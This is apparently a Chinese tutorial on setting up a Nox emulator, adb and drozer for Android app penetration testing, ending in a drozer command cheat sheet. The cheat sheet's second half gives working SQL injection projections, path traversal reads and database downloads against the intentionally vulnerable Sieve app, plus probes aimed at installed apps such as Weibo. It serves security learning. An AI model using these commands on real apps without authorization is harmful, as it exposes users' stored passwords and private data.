网上目前我是没看到有成熟的相关文档，在自己踩了几个坑之后，将使用文档整理出。

 

首先下载夜神模拟器，这个不难，百度一下就能下载。

adb下载：

链接：https://pan.baidu.com/s/1SKu24yyShwg16lyIupO5VA 提取码：ih0i（来源于其它博主，我懒得自己上传，时效的话联系我）

安装：不需要安装，解压然后放到目录下就行，任意路径，比如d盘下。

drozer下载：点击此处下载

安装：点击setup.exe即可一路安装完成，然后将agent.apk安装到模拟器里,点击开始监听31415端口。

cmd窗口里cd到adb的路径下，执行 adb connect 127.0.0.1:62001

开启端口转发 adb forward tcp:31415 tcp:31415

重新打开一个cmd窗口或者cd到drozer目录下执行 drozer console connect

可能会报错，报错如下需要安装配置java环境，具体配置方法我就不讲解了，自行百度。配置完成之后，按照提示操作。

在C:\Users\XXX\ 目录下，其中XXX为目前你登陆的系统账号的用户名，新建一个文件，重命名为.drozer_config，里面写上

[executables]
java=C:\Program Files\Java\jdk1.8.0_131\bin\java.exe
javac=C:\Program Files\Java\jdk1.8.0_131\bin\javac.exe

路径为你安装的java路径，自行替换。

再一次执行drozer console connect，即可看到

到此为止，安卓app的渗透测试环境就搭建完成了。

接下来讲解命令：ls 列出drozer所有功能模块：

然后使用adb列出所有的包：adb shell pm list packages

使用drozer命令：run app.package.list -f  搜索app所使用的包名:

输入命令：run app.package.info -a 查看app包的信息：

查看app可被攻击点，输入命令：run app.package.attacksurface

更多命令参考如下：（部分命令已不可用，详细drozer操作可查询官网手册或其它博文）

1.连接drozer：
drozer.bat console connect

2.列出详细APP信息：
run app.package.info -a com.xxx.xxxx

3.查看APP的配置信息
run app.package.manifest com.xxx.xxxx

3.分析是否存在攻击攻击点
run app.package.attacksurface com.xxx.xxxx

4.查看暴露的provider权限
run app.provider.info -a com.xxx.xxxx

5.获取Activity信息
命令 run app.activity.info -a
示例 run app.activity.info -a com.xxx.xxxx

6.检测SQL注入
命令 run scanner.provider.injection -a
示例 run scanner.provider.injection -a com.xxx.xxxx

7.检测目录遍历
命令 run scanner.provider.traversal -a
示例 run scanner.provider.traversal -a com.xxx.xxxx

8.获取所有可访问的Uri
命令 run scanner.provider.finduris -a
示例 run scanner.provider.finduris -a com.xxx.xxxx

9.SQL注入
命令 run app.provider.query [--projection] [--selection]
示例 run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/

列出所有表 run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/ --projection "* FROM SQLITE_MASTER WHERE type='table';--"
获取单表（如Key）的数据 run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/ --projection "* FROM Key;--"

10.读取文件系统下的文件
示例 run app.provider.read content://com.mwr.example.sieve.FileBackupProvider/etc/hosts

11.下载数据库文件到本地
示例 run app.provider.download content://com.mwr.example.sieve.FileBackupProvider/data/data/com.mwr.example.sieve/databases/database.db d:/database.db 

> list  //列出目前可用的模块，也可以使用ls
> help app.activity.forintent       //查看指定模块的帮助信息
> run app.package.list      //列出android设备中安装的app
> run app.package.info -a com.android.browser       //查看指定app的基本信息
> run app.activity.info -a com.android.browser      //列出app中的activity组件
> run app.activity.start --action android.intent.action.VIEW --data-uri  http://www.google.com  //开启一个activity，例如运行浏览器打开谷歌页面
> run scanner.provider.finduris -a com.sina.weibo       //查找可以读取的Content Provider
> run  app.provider.query content://settings/secure --selection "name='adb_enabled'"    //读取指定Content Provider内容
> run scanner.misc.writablefiles --privileged /data/data/com.sina.weibo     //列出指定文件路径里全局可写/可读的文件
> run shell.start       //shell操作
> run tools.setup.busybox       //安装busybox
> list auxiliary        //通过web的方式查看content provider组件的相关内容
> help auxiliary.webcontentresolver     //webcontentresolver帮助
> run auxiliary.webcontentresolver      //执行在浏览器中以http://localhost:8080即可访问
以sieve示例
> run app.package.list -f sieve         //查找sieve应用程序
> run app.package.info -a com.mwr.example.sieve         //显示app.package.info命令包的基本信息
> run app.package.attacksurface com.mwr.example.sieve   //确定攻击面
> run app.activity.info -a com.mwr.example.sieve         //获取activity信息
> run app.activity.start --component com.mwr.example.sieve com.mwr.example.sieve.PWList     //启动pwlist
> run app.provider.info -a com.mwr.example.sieve        //提供商信息
> run scanner.provider.finduris -a com.mwr.example.sieve        //扫描所有能访问地址
> run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/--vertical  //查看DBContentProvider/Passwords这条可执行地址
> run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/ --projection "'"   //检测注入
> run app.provider.read content://com.mwr.example.sieve.FileBackupProvider/etc/hosts    //查看读权限数据
> run app.provider.download content://com.mwr.example.sieve.FileBackupProvider/data/data/com.mwr.example.sieve/databases/database.db /home/user/database.db //下载数据
> run scanner.provider.injection -a com.mwr.example.sieve       //扫描注入地址
> run scanner.provider.traversal -a com.mwr.example.sieve
> run app.service.info -a com.mwr.example.sieve         //查看服务